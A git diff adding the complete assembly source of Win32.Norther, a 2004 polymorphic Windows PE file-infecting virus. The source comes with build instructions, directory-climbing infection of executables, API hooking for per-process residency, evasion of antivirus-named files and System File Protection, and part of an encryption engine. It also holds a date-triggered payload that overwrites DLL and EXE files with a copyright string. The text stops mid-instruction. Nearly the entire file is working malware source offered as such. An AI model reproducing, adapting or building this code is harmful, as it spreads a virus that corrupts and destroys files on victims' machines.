diff --git a/Win32/Win32.Norther.ASM b/Win32/Win32.Norther.ASM new file mode 100644 index 00000000..bb4b60ed --- /dev/null +++ b/Win32/Win32.Norther.ASM @@ -0,0 +1,2420 @@ +; +; Win32.Norther By DR-EF (c) 2004 +; ------------------------------- +; +; Virus Name:Win32.Norther +; Size:8k +; Type:PE Infector +; Author:DR-EF +; +; +; Virus Features: +; --------------- +; - Infect Files At 20 upper directorys level using +; the dot dot method +; +; - 2 methods of infection: .reloc section overwriting +; or append to last section +; +; - use size padding to mark infected files +; +; - E.P.O,the virus patch the mov eax,fs:[00000000] +; instruction with call virus_decryptor & inc ebx +; instead of modifly entry point +; +; - Per Process Residenty,Norther hook the WinExec, +; CreateProcess,SetCurrectDirectory,CreateFile apis +; and infect files when this apis called +; +; - Dont Infect SFC protected files & files that have +; name like av software +; +; - Norther Polymorphic\Encrypted using the Voltage +; polymorphic engine version 2.0 +; +; How To Compile: +; --------------- +; tasm32 /m3 /ml /zi Norther.asm , , ; +; tlink32 /tpe /aa /v Norther , Norther,,import32.lib +; pewrsec Norther.exe +; +; +; + + + +.386 +.model flat + + DEBUG equ 0 + VirusSize equ (VirusEnd-VirusStart) + extrn ExitProcess:proc + extrn GetModuleHandleA:proc + extrn MessageBoxA:proc + +.data + + db ? + +.code + + + +Norther: + mov eax,VirusSize + push offset FirstGen + pushad + jmp FG + VirusStart equ $ + mov esp,[esp + 8h] + pop dword ptr fs:[0] + add esp,0ch ;restore stack +FG: call Delta ;get delta offset +Delta: pop ebp + sub ebp,offset Delta + mov eax,400000h ;host image base + HostImageBase equ ($-VirusStart-4) + HostImageBase_ equ ($-4) + push eax ;save image base in the stack + add eax,[eax + 3ch] ;goto pe header offset + add eax,80h ;goto import data directory + mov eax,[eax] ;get it rva + add eax,[esp] ;convert it to va +@_Dll: mov esi,[eax + 0ch] ;get rva to dll name + cmp esi,0h ;no more imported dlls ? + je ReturnToHost + add esi,[esp] ;convert it to va + mov ecx,8h + call OverK32 + db "KERNEL32" +OverK32:pop edi + rep cmpsb ;compare dll name + je _____1 + add eax,14h ;move to next IMAGE_IMPORT_DESCRIPTOR + jmp @_Dll ;structure +_____1: mov esi,[eax] ;get rva to pointers to image import by name structures + add esi,[esp] ;convert it to va + xor edx,edx +@NxtApi:push edx ;save loop index + push esi ;save pointer to structures + mov esi,[esi] ;get import by name structure rva + add esi,[esp + 8h] ;convert it to va + add esi,2h ;skip the IBN_Hint + call OverGMH + db "GetModuleHandleA" +OverGMH:pop edi + mov ecx,10h + rep cmpsb ;compare api name + je GetAddr + pop esi + pop edx + add edx,4h + add esi,4h + jmp @NxtApi +GetAddr:pop esi + pop edx ;get loop index + mov esi,[eax + 10h] ;get rva to name + add esi,[esp] ;convert it to va + add esi,edx ;goto GetModuleHandleA api address + pop eax ;restore stack + mov eax,[esi] ;eax - GetModuleHandleA api address ! + call Over_K32 + db "Kernel32.dll",0 +Over_K32: + call eax ;get kernel32 image base + or eax,eax ;fail ? + je ReturnToHost + push eax ;save kernel32 image base in the stack + add eax,[eax + 3ch] + mov eax,[eax + 78h] + add eax,[esp] ;eax - kernel32 export table + push eax + xor edx,edx + mov eax,[eax + 20h] + add eax,[esp + 4h] + mov edi,[eax] + add edi,[esp + 4h] ;edi - api names array + dec edi +NxtCmp: inc edi + call OverGPA + db "GetProcAddress",0 +OverGPA:pop esi + mov ecx,0eh + rep cmpsb + je GetGPA + inc edx +Nxt_1: cmp byte ptr [edi],0h + je NxtCmp + inc edi + jmp Nxt_1 +GetGPA: pop eax ;eax - kernel32 export table + shl edx,1h ;edx - GetProcAddress position + mov ebx,[eax + 24h] + add ebx,[esp] + add ebx,edx + mov dx,word ptr [ebx] + shl edx,2h + mov ebx,[eax + 1ch] + add ebx,[esp] + add ebx,edx + mov ebx,[ebx] + add ebx,[esp] + mov [ebp + GetProcAddress],ebx + mov ecx,NumberOfApis + call OverNames + + db "CreateFileA",0 + db "CloseHandle",0 + db "CreateFileMappingA",0 + db "MapViewOfFile",0 + db "UnmapViewOfFile",0 + db "FindFirstFileA",0 + db "FindNextFileA",0 + db "FindClose",0 + db "SetCurrentDirectoryA",0 + db "GetCurrentDirectoryA",0 + db "GetFileSize",0 + db "SetFilePointer",0 + db "SetEndOfFile",0 + db "GetTickCount",0 + db "LoadLibraryA",0 + db "MultiByteToWideChar",0 + db "GetFullPathNameA",0 + db "GetSystemTime",0 + +OverNames: + pop eax + Call OverAddresses + + + CreateFile dd 0 + CloseHandle dd 0 + CreateFileMapping dd 0 + MapViewOfFile dd 0 + UnmapViewOfFile dd 0 + FindFirstFile dd 0 + FindNextFile dd 0 + FindClose dd 0 + SetCurrentDirectory dd 0 + GetCurrentDirectory dd 0 + GetFileSize dd 0 + SetFilePointer dd 0 + SetEndOfFile dd 0 + GetTickCount dd 0 + LoadLibrary dd 0 + MultiByteToWideChar dd 0 + GetFullPathName dd 0 + GetSystemTime dd 0 + + NumberOfApis equ 18 + + + GetProcAddress dd 0 + + CopyRight db "Win32.Norther (c) 2004 DR-EF" + +OverAddresses: + pop ebx + pop edx +NextAPI:push ecx + push edx + push eax + push eax + push edx + call [ebp + GetProcAddress] + cmp eax,0h + jne SaveIt + add esp,0ch + jmp ReturnToHost +SaveIt: mov dword ptr [ebx],eax + pop eax +NextSTR:inc eax + cmp byte ptr [eax],0h + jne NextSTR + inc eax + add ebx,4h + pop edx + pop ecx + loop NextAPI + ;check for payload + lea eax,[ebp + SYSTEMTIME] + push eax + call [ebp + GetSystemTime] + cmp word ptr [ebp + wMonth],0ch + jne skp_p + cmp word ptr [ebp + wDay],1dh + jne skp_p + inc byte ptr [ebp + active_payload] + mov dword ptr [ebp + SearchMask + 1],"lld." ;bye bye *.dll +skp_p: ;get SfcIsProtectedFile API + mov dword ptr [ebp + SfcIsFileProtected],0 + call OverSfc + db "SFC.DLL",0 +OverSfc:call [ebp + LoadLibrary] ;load sfc.dll + or eax,eax + je NoSFC + call OvrSfc + db "SfcIsFileProtected",0 +OvrSfc: push eax + call [ebp + GetProcAddress] ;get SfcIsFileProtected api + or eax,eax + je NoSFC + mov dword ptr [ebp + SfcIsFileProtected],eax +NoSFC: lea eax,[ebp + CurrentDirectory] ;we finish to get apis,now lets infect + push eax ;files in the currect & upper directorys + push 0ffh + call [ebp + GetCurrentDirectory] + cmp eax,0h + je HookApis + call InfectDirectory + lea eax,[ebp + CurrentDirectory] + push eax + call [ebp + SetCurrentDirectory] +HookApis: + ;hook winexec + mov eax,dword ptr [ebp + HostImageBase_] + lea ebx,[ebp + Hook_Dll1] + lea ecx,[ebp + Win_execfn] + lea edx,[ebp + WinExecHook] + call HookApi + mov dword ptr [ebp + WinExec_addr],eax + ;hook CreateFileA + mov eax,dword ptr [ebp + HostImageBase_] + lea ebx,[ebp + Hook_Dll1] + lea ecx,[ebp + CreateFile_fn] + lea edx,[ebp + CreateFile_Hook] + call HookApi + mov dword ptr [ebp + CreateFile_addr],eax + ;hook CreateProcessA + mov eax,dword ptr [ebp + HostImageBase_] + lea ebx,[ebp + Hook_Dll1] + lea ecx,[ebp + CreateProcess_fn] + lea edx,[ebp + CreateProcess_Hook] + call HookApi + mov dword ptr [ebp + CreateProcess_addr],eax + ;hook SetCurrentDirectory + mov eax,dword ptr [ebp + HostImageBase_] + lea ebx,[ebp + Hook_Dll1] + lea ecx,[ebp + SetCurrentDirectory_fn] + lea edx,[ebp + SetCurrentDirectory_Hook] + call HookApi + mov dword ptr [ebp + SetCurrentDirectory_addr],eax +ReturnToHost: + popad + db 64h,0a1h,0,0,0,0 ;mov eax,fs:[00000000] + dec ebx + ret + + + SYSTEMTIME: + wYear dw 0 + wMonth dw 0 + wDayOfWeek dw 0 + wDay dw 0 + wHour dw 0 + wMinute dw 0 + wSecond dw 0 + wMilliseconds dw 0 + + +Payload: ;the "Payload" ! +IF DEBUG + int 3 +ENDIF + lea ebx,[ebp + cFileName] + call OpenFile + lea esi,[ebp + CopyRight] + xchg edi,eax + mov ecx,29ah + rep movsb + mov dword ptr [ebp + FileSize],29ah + call RestoreFile + call CloseFile + ret + + active_payload db 0 + +;--------------- api hooks -------------------------- + + + +WinExecHook: +IF DEBUG + int 3 +ENDIF + pushad + pushfd + call HookD +HookD: pop ebp + sub ebp,offset HookD + mov esi,[esp + 28h] + call CheckFileName + jc SkipFile1 + mov ebx,[esp + 28h] + call InfectFile +SkipFile1: + popfd + popad + push ebp + call Hook_D +Hook_D: pop ebp + sub ebp,offset Hook_D + xchg eax,ebp + pop ebp + jmp dword ptr [eax + WinExec_addr] + + + WinExec_addr dd 0 + Win_execfn db "WinExec",0 + + + +CreateFile_Hook: +IF DEBUG + int 3 +ENDIF + pushad + pushfd + call HookD4 +HookD4: pop ebp + sub ebp,offset HookD4 + xor ecx,ecx + mov esi,[esp + 28h] +NxtByte:cmp byte ptr [esi],0h + je GetDir + inc ecx + inc esi + jmp NxtByte +GetDir: mov esi,[esp + 28h] + add esi,ecx +@NxtByt:dec esi + dec ecx + cmp byte ptr [esi],'\' + jne @NxtByt + mov esi,[esp + 28h] + lea edi,[ebp + CurrentDirectory] + rep movsb + lea eax,[ebp + CurrentDirectory] + push eax + call [ebp + SetCurrentDirectory] + call InfectDirectory + popfd + popad + push ebp + call Hook_D4 +Hook_D4:pop ebp + sub ebp,offset Hook_D4 + xchg eax,ebp + pop ebp + jmp dword ptr [eax + CreateFile_addr] + + CreateFile_addr dd 0 + CreateFile_fn db "CreateFileA",0 + + +CreateProcess_Hook: +IF DEBUG + int 3 +ENDIF + pushad + pushfd + call HookD3 +HookD3: pop ebp + sub ebp,offset HookD3 + mov esi,[esp + 28h] + call CheckFileName + jc SkipFile2 + mov ebx,[esp + 28h] + call InfectFile +SkipFile2: + popfd + popad + push ebp + call Hook_D3 +Hook_D3:pop ebp + sub ebp,offset Hook_D3 + xchg eax,ebp + pop ebp + jmp dword ptr [eax + CreateProcess_addr] + + + CreateProcess_addr dd 0 + CreateProcess_fn db "CreateProcessA",0 + + + +SetCurrentDirectory_Hook: +IF DEBUG + int 3 +ENDIF + pushad + pushfd + call HookD2 +HookD2: pop ebp + sub ebp,offset HookD2 + push dword ptr [esp+28h] + call [ebp + SetCurrentDirectory] + call InfectDirectory + popfd + popad + push ebp + call Hook_D2 +Hook_D2:pop ebp + sub ebp,offset Hook_D2 + xchg eax,ebp + pop ebp + jmp dword ptr [eax + SetCurrentDirectory_addr] + + + + SetCurrentDirectory_addr dd 0 + SetCurrentDirectory_fn db "SetCurrentDirectoryA",0 + + + + Hook_Dll1 db "KERNEL32",0 + + + +;------------------------------------------------------ + + +;infect files in 20 directorys level(upper), +;input: +;currect directory already setted +InfectDirectory: + mov byte ptr [ebp + DirLevel],0h ;init the directory level counter +Nextdir:cmp byte ptr [ebp + DirLevel],14h + je ExitSearch + lea eax,[ebp + WIN32_FIND_DATA] + push eax + call OverSM +SearchMask equ $ + db "*.exe",0 +OverSM: call [ebp + FindFirstFile] + cmp eax,INVALID_HANDLE_VALUE + je nxt_dir + mov [ebp + hfind],eax +i_file: cmp byte ptr [ebp + active_payload],1h + jne skip_p + call Payload +skip_p: mov eax,[ebp + nFileSizeLow] + call PadSize + cmp edx,0h ;already infected ? + je skipf + lea esi,[ebp + cFileName] + call CheckFileName + jnc skipf + lea ebx,[ebp + cFileName] + call InfectFile +skipf: lea eax,[ebp + WIN32_FIND_DATA] + push eax + push [ebp + hfind] + call [ebp + FindNextFile] + or eax,eax + jne i_file +nxt_dir:inc [ebp + DirLevel] + call OverDD + db "..",0 +OverDD: call [ebp + SetCurrentDirectory] + or eax,eax + jne Nextdir +ExitSearch: + ret + + DirLevel db 0h + hfind dd 0 + CurrentDirectory db 0ffh dup(0) + + WIN32_FIND_DATA: + dwFileAttributes dd 0 + ftCreationTime dq 0 + ftLastAccessTime dq 0 + ftLastWriteTime dq 0 + nFileSizeHigh dd 0 + nFileSizeLow dd 0 + dwReserved0 dd 0 + dwReserved1 dd 0 + cFileName db 0ffh dup (0) + cAlternateFileName db 14h dup (0) + + INVALID_HANDLE_VALUE equ -1 + + +;ebx - file name +InfectFile: +IF DEBUG + int 3 +ENDIF + pushad + lea eax,[ebp + Infection_Err_Handler] + push eax + xor eax,eax + push dword ptr fs:[eax] ;set SEH to protect infection function + mov fs:[eax],esp + ;check for SFC! + cmp [ebp + SfcIsFileProtected],0h ;there is sfc api ? + je Sfc_Ok + push ebx ;save file name + mov ecx,0ffh ;(1024/4) + xor eax,eax + lea edi,[ebp + FullPath] + rep stosd ;blank buffers + lea eax,[ebp + File_Name] + push eax + lea eax,[ebp + FullPath] + push eax + push 260 + push ebx + call [ebp + GetFullPathName] ;get file full path + or eax,eax + jne GetUnic + pop ebx + jmp ExitInfect +GetUnic:push 260 + lea eax,[ebp + UnicodePath] + push eax + push -1 ;string is null terminated + lea eax,[ebp + FullPath] + push eax + xor eax,eax + push eax + push eax + call [ebp + MultiByteToWideChar] ;convert path into unicode + or eax,eax + jne CheckSFC + pop ebx + jmp ExitInfect +CheckSFC: + lea eax,[ebp + UnicodePath] + push eax + push 0h + call [ebp + SfcIsFileProtected] ;check if the file protected: + or eax,eax + je No_Protect + pop ebx + jmp ExitInfect +No_Protect: + pop ebx ;restore file name +Sfc_Ok: + ;open file ! + call OpenFile ;open & map the file + jnc ExitInfect + cmp word ptr [eax],"ZM" ;check mz sign + jne InfectErr + add eax,[eax + 3ch] + cmp word ptr [eax],"EP" ;check pe sign + jne InfectErr + cmp word ptr [eax + 04h],14Ch ;infect only intel 386 + jne InfectErr + mov dx,word ptr [eax + 16h] + and dx,2000h + cmp dx,2000h ;dont infect dlls + je InfectErr + push eax ;save pe header in the stack + ;check if the program import the GetModuleHandleA api,which we most need it + cmp dword ptr [eax+80h],0h ;the program has imports ? + jne Import_ + pop eax ;restore stack + jmp InfectErr +Import_:mov edx,[eax + 80h] ;get rva to import section + xor ecx,ecx + mov cx,[eax + 6h] ;get number of sections + mov ebx,[eax + 74h] ;get number of data directorys + shl ebx,3h + add eax,ebx + add eax,78h ;goto first section body +FindImp:cmp dword ptr [eax + 0ch],edx ;compare section rva,with import section rva + je _Import + add eax,28h ;goto next section + loop FindImp + pop eax ;restore stack + jmp InfectErr ;some thing went wrong. +_Import:mov eax,[eax + 14h] ;get pointer to raw data rva + add eax,[ebp + mapbase] ;convert it to va + push eax ;save import section start +@NxtDLL:mov ebx,[eax + 0ch] ;get dll name rva + cmp ebx,0h ;no more dlls ? + jne ____3 + add esp,8h ;restore stack + jmp InfectErr +____3: sub ebx,edx + add ebx,[esp] ;convert it to va + mov edi,ebx + mov ecx,8h + call OverK32_ + db "KERNEL32" +OverK32_: + pop esi + rep cmpsb + je ____2 + add eax,14h + jmp @NxtDLL +____2: mov esi,[eax] ;get rva to pointers to image import by name structures + sub esi,edx + add esi,[esp] ;convert it to va +NextApi:push esi ;save pointer to IBN structures + mov edi,[esi] + sub edi,edx + add edi,[esp + 4h] + add edi,2h ;skip the IBN_Hint + call _GMH + db "GetModuleHandleA" +_GMH: pop esi + mov ecx,10h + rep cmpsb + je GMH_Ok + pop esi + add esi,4h + cmp dword ptr [esi],0h + jne NextApi + add esp,0ch + jmp InfectErr + +GMH_Ok: add esp,8h ;restore stack + ;check if the code section has enough space for the decryptor + mov eax,[esp] ;get pe header + xor ecx,ecx + mov cx,[eax + 6h] ;get number of sections + mov ebx,[eax + 74h] ;get number of data directorys + shl ebx,3h + add eax,ebx + add eax,78h ;eax - first section header +@NS: mov ebx,[eax + 24h] ;get section flags + and ebx,20h + cmp ebx,20h + je _CheckS + add eax,28h ;move to next section + loop @NS +_CheckS:mov ebx,[eax + 10h] ;get size of raw data + sub ebx,[eax + 8h] ;sub from it the virtual size + cmp ebx,0beh ;free space most be at least 190 bytes + ja SpaceOk + pop eax + jmp InfectErr +SpaceOk:mov ebx,[eax + 14h] ;get pointer to raw data + add ebx,[eax + 8h] ;add the virtual size to it + add ebx,[ebp + mapbase] ;add the mapbase + mov [ebp + WhereToWriteDecryptor],ebx + push dword ptr [eax + 8h] + push dword ptr [eax + 10h] ;push size of raw data + pop dword ptr [eax + 8h] ;overwrite virtual size with it + ;patch instruction in the code section + push eax + mov ecx,100h + mov eax,[esp + 8h] ;get pe header + mov eax,[eax + 28h] ;get entry point + add eax,[ebp + mapbase] ;goto entry point + call ScanAndPatch + jnc ScanAll + add esp,8h ;restore stack + jmp Patch_OK +ScanAll:pop eax + pop ecx ;get virtual size + mov eax,[eax + 14h] + add eax,[ebp + mapbase] + call ScanAndPatch ;replace mov eax,fs:[00000000] with call virus + jc Patch_OK + pop eax + jmp InfectErr +Patch_OK: + ;check if the program has .reloc section,and if it has enough space for the virus + mov byte ptr [ebp + RelocInfection],0h + mov eax,[esp] ;get pe header + cmp dword ptr [eax + 0a0h],0h ;there is reloc section ? + je LastSection + mov edx,[eax + 0a0h] ;get rva to .reloc section + mov eax,[esp] ;get pe header + xor ecx,ecx + mov cx,[eax + 6h] ;get number of sections + mov ebx,[eax + 74h] ;get number of data directorys + shl ebx,3h + add eax,ebx + add eax,78h ;eax - first section header +@F_RLC: mov ebx,[eax + 0ch] ;get virtual address + cmp ebx,edx + je CheckReloc + add eax,28h + loop @F_RLC + jmp LastSection ;error,try last section method +CheckReloc: + cmp dword ptr [eax + 10h],VirusSize ;compare size of raw data with virus size + jb LastSection + push dword ptr [eax + 10h] + pop dword ptr [eax + 8h] ;fix section size + or dword ptr [eax + 24h],0c0000020h;set section flags to code\readable\writeable + push eax + mov ebx,eax + mov [ebp + FixRVA],0 ;add VirtualSize-PointerToRawData + mov eax,[ebx + 0ch] ;subtraction to the virus offset + sub eax,[ebx + 14h] ;when decrypting and jumping to + mov [ebp + FixRVA],eax ;virus at runtime. + pop eax + mov edi,[eax + 14h] + add edi,[ebp + mapbase] + mov [ebp + StartOfDataToEncrypt],edi + push edi ;save virus offset in infected file + lea esi,[ebp + VirusStart] + mov ecx,VirusSize + rep movsb ;copy virus into host + mov eax,[esp+4h] ;get pe header + mov dword ptr [eax + 0a0h],0h ;clear relocation data directory + mov dword ptr [eax + 0a4h],0h + inc byte ptr [ebp + RelocInfection] + jmp FixPE +LastSection: + mov eax,[esp] ;get pe header + xor ecx,ecx + mov cx,[eax + 6h] ;get number of sections + dec ecx + mov ebx,[eax + 74h] ;get number of data directorys + shl ebx,3h + add eax,ebx + add eax,78h ;eax - first section +@Ls: add eax,28h ;move to next section + loop @Ls + or dword ptr [eax + 24h],0c0000020h;set section flags to code\readable\writeable + push dword ptr [eax + 8h] ;save virtual size + add dword ptr [eax + 8h],VirusSize ;add virus size to section virtual size + xchg eax,ebx + mov eax,[ebx + 8h] ;get section new virtual size + mov ecx,dword ptr [esp+4h] ;get pe header + mov ecx,[ecx + 3ch] ;get file alignment + push eax ;\ + xor edx,edx ; \ + div ecx ;-->align section size + sub ecx,edx ; / + pop dword ptr [ebx + 10h] ;/ + add dword ptr [ebx + 10h],ecx ;set new section size of raw data + mov [ebp + FixRVA],0 ;add VirtualSize-PointerToRawData + mov eax,[ebx + 0ch] ;subtraction to the virus offset + sub eax,[ebx + 14h] ;when decrypting and jumping to + mov [ebp + FixRVA],eax ;virus at runtime. + pop edi + add edi,[ebx + 14h] ;get pointer to raw data + add edi,[ebp + mapbase] + mov [ebp + StartOfDataToEncrypt],edi + push edi ;save virus offset in infected files + lea esi,[ebp + VirusStart] + mov ecx,VirusSize + rep movsb ;copy virus to the host +FixPE: ;fix size of image in pe header & image base in the virus + cmp byte ptr [ebp + RelocInfection],0h + je _FixVir + mov ebx,[esp+4h] ;get pe header + mov eax,[ebx + 50h] ;get size of image + add eax,VirusSize + push eax + xor edx,edx + mov ecx,[ebx + 38h] ;get section alignment + div ecx + sub ecx,edx + pop eax + add eax,ecx ;align size of image + mov dword ptr [ebx + 50h],eax ;set new size of image +_FixVir:pop edi ;restore virus offset in infected file + pop esi ;get pe header + mov eax,[esi + 34h] ;get image base + mov [edi + HostImageBase],eax ;set image base in the virus + ;encrypt it & write polymorphic decryptor + mov [ebp + ProgramImageBase],eax ;set image base in the decryptor + call CreateDecryptor + ;close the file + cmp byte ptr [ebp + RelocInfection],0h + je _CloseF + mov eax,dword ptr [ebp + FileSize] + call PadSize + push FILE_BEGIN + push 0h + push eax + push dword ptr [ebp + hfile] + call [ebp + SetFilePointer] + push dword ptr [ebp + hfile] + call [ebp + SetEndOfFile] + call CloseFile + jmp ExitInfect +_CloseF: + call PadFileSize + call CloseFile +ExitInfect: + pop dword ptr fs:[0] + add esp,4h + popad + ret +InfectErr: + call RestoreFile + call CloseFile + pop dword ptr fs:[0] + add esp,4h + popad + ret + +Infection_Err_Handler: + mov esp,[esp + 8h] + pop dword ptr fs:[0] + add esp,4h + popad + ret + + + SfcIsFileProtected dd 0 + File_Name dd 0 + FullPath db 520 dup(0) + UnicodePath db 520 dup(0) + + +;scan a code for mov eax,fs:[00000000] instruction and +;patch it with call virus_decryptor and inc ebx instruction +;input: +;eax - address of code +;ecx - size of code to scan +;output: +;carry flag - success\fail. +ScanAndPatch: +__1: cmp word ptr [eax],0a164h + jne nxt_w + cmp dword ptr [eax + 2h],0 + jne nxt_w + mov byte ptr [eax],0e8h ;call instruction + mov ebx,[ebp + WhereToWriteDecryptor] + push eax + sub eax,[ebp + mapbase] + sub ebx,eax + sub ebx,5h + sub ebx,[ebp + mapbase] + pop eax + mov dword ptr [eax + 1h],ebx + mov byte ptr [eax + 5h],43h ;inc ebx instruction + jmp patchok ;patch only one time. +nxt_w: inc eax + loop __1 + jmp nopatch +patchok:stc + ret +nopatch:clc + ret + + +;check if file is related to programms that has checksum protection or canot be infected +;input: +;esi - file name +;output: +;carry flag + +CheckFileName: + xor ecx,ecx +@checkV:cmp byte ptr [esi + ecx],'v' + je badfile + cmp byte ptr [esi + ecx],'V' + je badfile + cmp byte ptr [esi + ecx],0h + je no_v + inc ecx + jmp @checkV +no_v: push esi ;save file name for later use + mov ecx,TwoBytesNames ;scan for 2 bytes bad name + lea edi,[ebp + DontInfectTable] +l2: mov bx,word ptr [edi] +l2_1: mov ax,word ptr [esi] + cmp ax,bx + je ex_rs + add bx,2020h + cmp ax,bx + je ex_rs + sub bx,2020h + inc esi + cmp byte ptr [esi],0h + jne l2_1 + mov esi,[esp] ;restore file name + add edi,2h + loop l2 + mov ecx,FourBytesNames ;scan for 4 bytes bad name + lea edi,[ebp + DontInfectTable + (2*TwoBytesNames)] + mov esi,[esp] ;get file name +l3: mov ebx,dword ptr [edi] +l3_1: mov eax,dword ptr [esi] + cmp eax,ebx + je ex_rs + add ebx,20202020h + cmp eax,ebx + je ex_rs + sub ebx,20202020h + inc esi + cmp byte ptr [esi],0h + jne l3_1 + mov esi,[esp] + add edi,4h + loop l3 + pop esi + stc + ret +ex_rs: pop esi +badfile:clc + ret + +DontInfectTable: + + db "FP" + db "TB" + db "AW" + db "DR" + db "F-" + TwoBytesNames equ 5 + db "INOC" + db "PAND" + db "ANTI" + db "AMON" + db "N32S" + db "NOD3" + db "NPSS" + db "SMSS" + db "SCAN" + db "ZONE" + db "PROT" + db "MONI" + db "RWEB" + db "MIRC" + db "CKDO" + db "TROJ" + db "SAFE" + db "JEDI" + db "TRAY" + db "ANDA" + db "SPID" + db "PLOR" + db "NDLL" + db "TREN" + db "NSPL" + db "NSCH" + db "ALER" + + FourBytesNames equ 27 + + + + + +;open & map a file into the memory: +;input: +; ebx - filename +;output +; carry flag +OpenFile: + xor eax,eax + push eax + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push eax + push eax + push GENERIC_READ or GENERIC_WRITE + push ebx + call [ebp + CreateFile] + cmp eax,INVALID_HANDLE_VALUE + je OpenFileErr + mov dword ptr [ebp + hfile],eax + push 0h + push eax + call [ebp + GetFileSize] + cmp eax,0ffffffffh + je FileSizeErr + mov dword ptr [ebp + FileSize],eax + call PadSize + cmp edx,0h + je FileSizeErr ;already infected + xor eax,eax + push eax + push dword ptr [ebp + FileSize] + add dword ptr [esp],VirusSize + push eax + push PAGE_READWRITE + push eax + push dword ptr [ebp + hfile] + call [ebp + CreateFileMapping] + cmp eax,0h + je FileSizeErr + mov dword ptr [ebp + hmap],eax + push dword ptr [ebp + FileSize] + add dword ptr [esp],VirusSize + xor eax,eax + push eax + push eax + push FILE_MAP_WRITE + push dword ptr [ebp + hmap] + call dword ptr [ebp + MapViewOfFile] + cmp eax,0h + je FileMapErr + mov dword ptr [ebp + mapbase],eax + stc + ret +FileMapErr: + push [ebp + hmap] + call [ebp + CloseHandle] +FileSizeErr: + push [ebp + hfile] + call [ebp + CloseHandle] +OpenFileErr: + clc + ret + + +CloseFile: + push dword ptr [ebp + mapbase] + call [ebp + UnmapViewOfFile] + push dword ptr [ebp + hmap] + call [ebp + CloseHandle] + push dword ptr [ebp + hfile] + call [ebp + CloseHandle] + ret + +RestoreFile: + xor eax,eax + push eax + push eax ;FILE_BEGIN + push dword ptr [ebp + FileSize] + push dword ptr [ebp + hfile] + call [ebp + SetFilePointer] + push dword ptr [ebp + hfile] + call [ebp + SetEndOfFile] + ret + + +PadFileSize: + mov eax,dword ptr [ebp + FileSize] + add eax,VirusSize + call PadSize + push FILE_BEGIN + push 0h + push eax + push dword ptr [ebp + hfile] + call [ebp + SetFilePointer] + push dword ptr [ebp + hfile] + call [ebp + SetEndOfFile] + ret + + + hfile dd 0 + hmap dd 0 + mapbase dd 0 + FileSize dd 0 + RelocInfection db 0 + + + + CreationTime dq 0 + LastAccessTime dq 0 + LastWriteTime dq 0 + + + + FILE_ATTRIBUTE_NORMAL equ 00000080h + OPEN_EXISTING equ 3 + GENERIC_READ equ 80000000h + GENERIC_WRITE equ 40000000h + INVALID_HANDLE_VALUE equ -1 + PAGE_READWRITE equ 4h + FILE_MAP_WRITE equ 00000002h + FILE_BEGIN equ 0 + +;pad size by 101 +;input: +; eax - size +;output: +; eax - new size +; edx - reminder +PadSize: + push eax + xor edx,edx + mov ecx,65h ;101d + div ecx + cmp edx,0h + je NoPad + sub ecx,edx + xchg ecx,edx +NoPad: pop eax + add eax,edx + ret + + +;input: +;eax - image base +;ebx - dll name +;ecx - function name +;edx - hook procedure +;output +;eax - new function address or 0 if fail +HookApi: + cmp word ptr [eax],"ZM" ;check mz sign + jne HookErr + push eax ;save image base in the stack + add eax,[eax + 3ch] ;goto pe header + add eax,80h + mov eax,[eax] ;get import section rva + cmp eax,0h + je HookErr_ + add eax,[esp] ;convert it to va +@Dll: mov esi,[eax + 0ch] + cmp esi,0h + je HookErr_ + add esi,[esp] ;esi - dll name + ;compare the dll name in [esi],with our dll: + pushad + xchg edi,ebx + xor ecx,ecx +@Gsize: cmp byte ptr [edi+ecx],0h ;get our dll size + je _Size + inc ecx + jmp @Gsize +_Size: rep cmpsb + je _dll + popad + add eax,14h ;move to next IMAGE_IMPORT_DESCRIPTOR structure + jmp @Dll +_dll: popad + ;edx - Hook procedure + ;ecx - function to hook + ;eax - IMAGE_IMPORT_DESCRIPTOR of our api dll + ;[esp] - image base + mov ebx,[eax] ;get rva to pointers to image import by name structures + add ebx,[esp] ;convert it to va + xor edi,edi ;used to save loop index +@FindApi: + ;ebx - pointer to pointers arrary of import by name structures + push edi ;save loop index + push ebx ;save pointer to import by name structures + push eax ;save import section rva + push ecx ;save function to hook name + push edx ;save hook procedure + mov esi,[ebx] ;get import by name structure rva + add esi,[esp + 14h] ;convert it to va + add esi,2h ;skip the IBN_Hint + mov edi,ecx ;move our api name into edi + xor ecx,ecx ;used to save our api name size +@GSize_:cmp byte ptr [edi + ecx],0h ;did we in the end ? + je ___Size + inc ecx + jmp @GSize_ +___Size:inc ecx ;include the 0 + rep cmpsb ;compare api names + je ApiFound ;we found it ! + pop edx + pop ecx + pop eax + pop ebx + pop edi + add edi,4h + add ebx,4h ;move to next pointer + cmp dword ptr [ebx],0h ;no more pointers ??? + jne @FindApi +HookErr_: + pop eax +HookErr:xor eax,eax + ret +ApiFound: + pop edx + pop ecx + pop eax + pop ebx + pop edi + mov esi,[eax + 10h] ;rva to name + add esi,[esp] + add esi,edi ;goto our api address + mov eax,[esi] ;get our api old address + mov [esi],edx ;hook it ! + pop esi ;restore stack + ret + +;--------------------------------------------------------------------------- + +;Voltage PolyMorphic Engine,Version 2.0: +;--------------------------------------- +;encrypt code with 4 bytes key with diffrent way each time +;and create polymorphic decryptor,the polymorphic decryptor +;has diffrent instructions that do the same thing mixed with +;junk code,with anti emulation/debuggin tricks + + +CreateDecryptor: + call InitRandomNumber ;init random number generator + call GenRandomNumber + and eax,1f40h ;get random numebr between 0 ~ 8000 + cmp eax,7d0h + ja NextM + mov byte ptr [ebp + EncryptionMethod],1h ;use not + jmp EncryptVirus +NextM: cmp eax,0fa0h + ja NextM2 + mov byte ptr [ebp + EncryptionMethod],2h ;use add + jmp EncryptVirus +NextM2: cmp eax,1770h + ja NextM3 + mov byte ptr [ebp + EncryptionMethod],3h ;use sub + jmp EncryptVirus +NextM3: mov byte ptr [ebp + EncryptionMethod],4h ;use xor +EncryptVirus: + call GenRandomNumber + mov dword ptr [ebp + key],eax ;get random key + xor eax,eax + mov ecx,SizeOfDataToEncrypt ;size of data in words + mov edi,[ebp + StartOfDataToEncrypt] + mov esi,edi +@enc: lodsd + cmp byte ptr [ebp + EncryptionMethod],1h ;is not ? + jne NextE + not eax + jmp _stosw +NextE: cmp byte ptr [ebp + EncryptionMethod],2h ;is add ? + jne NextE2 + add eax,dword ptr [ebp + key] + jmp _stosw +NextE2: cmp byte ptr [ebp + EncryptionMethod],3h ;is sub ? + jne NextE4 + sub eax,dword ptr [ebp + key] + jmp _stosw +NextE4: xor eax,dword ptr [ebp + key] ;xor +_stosw: stosd + loop @enc + mov edi,[ebp + 